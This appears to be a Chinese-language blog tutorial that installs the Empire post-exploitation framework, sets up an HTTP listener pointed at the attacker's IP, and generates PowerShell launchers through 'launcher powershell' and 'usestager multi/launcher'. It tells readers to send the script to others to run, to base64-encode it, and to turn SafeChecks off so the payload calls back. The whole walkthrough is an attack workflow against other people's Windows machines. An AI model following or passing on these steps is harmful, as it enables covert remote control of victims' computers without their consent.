后渗透神器Empire的安装和示例


00X00 简介

Empire是一款针对于Windows平台使用Powershell脚本作为攻击载荷的渗透攻击框架,具有很多功能,Emipire官网:https://www.powershellempire.com。虽然感觉一年多没更新了,但使用起来还是很好的。有个条件就是Empire要运行在linux平台。


00X01 下载
在linux终端输入:git clone https://github.com/EmpireProject/Empire
2019-11-25_02-03-20.png

注:经过我本人亲测,如果报错显示为:-bash:git:command not found,有以下两种linux的解决方法:
Centos:yum install git -y https://github.com/EmpireProject/Empire
Ubuntu/Debian:apt-get install git -y https://github.com/EmpireProject/Empire

然后我们进入Empire的setup文件夹:cd Empire/setup/
2019-11-25_02-22-44.png

然后我们运行install.sh安装:sh install.sh或者sudo ./install.sh

然后等待安装完成,注意可能会在执行最后一个指令的时候需要你输入当前系统的root密码!

安装完成后,我们回到Empire目录,运行empire就行:sudo ./empire或者./empire
2019-11-25_02-31-30.png

如果提示-bash:./empire:权限不够:chmod 777 empire

出现这个样子就代表咱们安装成功了!

注:经过我本人亲测,没这么简单,我这个直接显示是因为我之前就安装好了,已经解决缺少模板报错这个问题的。
那我接下来就讲会遇到的问题:
问题:ImportError:No module named XXXXX
方法:centos:yum install xxxxx
Debian/Ubuntu:apt-get install python-xxxxxx
通用:pip install xxxx
注意如果centos的方法试了之后还是这样,那就使用通用的这个办法,然后在输入sudo ./empire查看还缺什么模板,都安装之后就会出现我这样的样子了!这就代表安装完成!


00X02 入门

输入sudo ./empire进来后,可以输入help可以查看帮助文档!
2019-11-25_02-42-27.png

我给大家示范一个http监听:
输入listeners查看当前有多少监听,然后输入uselistener http

输入info查看相关参数,这里我们需要设置的是Host,Name和Port
host:接受信息的ip和端口(默认为80) 格式http://xxx.xxx.xxx.xxx:xx
name:自定义项目名称(这个都能看懂吧)
Port:端口

set Host http://自己的ip:80 //设置接收监听信息
set Name test1  //自定义项目名称
set Port 80  //自定义端口

然后我们设置完成后,输入info在查看一遍,无错的话,输入execute启动项目监听
2019-11-25_17-12-19.png

2019-11-25_17-24-00.png

2019-11-25_17-26-21.png

到这基本就设置完成了,我们可以输入back返回上一级,然后输入list查看当前的监听项目,test2就是我们刚刚设置的监听项目。

然后我们记得empire的简介嘛?用powershell来进行后渗透,我们可以来生成一个powershell脚本,然后输入launcher powershell 自定义的项目名称
2019-11-25_17-32-07.png

出现的这些代码就是我们生成的powershell脚本,只要把这个发给别人,然后对方用powershell运行,我们这边就会显示的!
这些代码我们可以用base64进行再加密!

但我后面再虚拟机上测试时,将我们生成的脚本在目标机器打开后,没反应,不知道是不是我机子的问题。但我还是在后面查找资料解决了问题:我们进入这个模板:usestager multi/launcher然后输入info查看详细配置,找到SafeChecks发现显示是Ture,SafeChecks是监测运行环境是否可行的参数,我们将它改为False:set SafeChecks False
2019-11-25_17-42-50.png

然后我们再输入set Listener 自定义名称之后输入execute开始执行,会给你一段powershell脚本代码。你会发现比之前的代码量少多了,这时候只要让目标在电脑执行这串指令代码就行了
2019-11-25_17-45-58.png

声明:苏茗鹿的空间|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接


Carpe Diem and Do what I like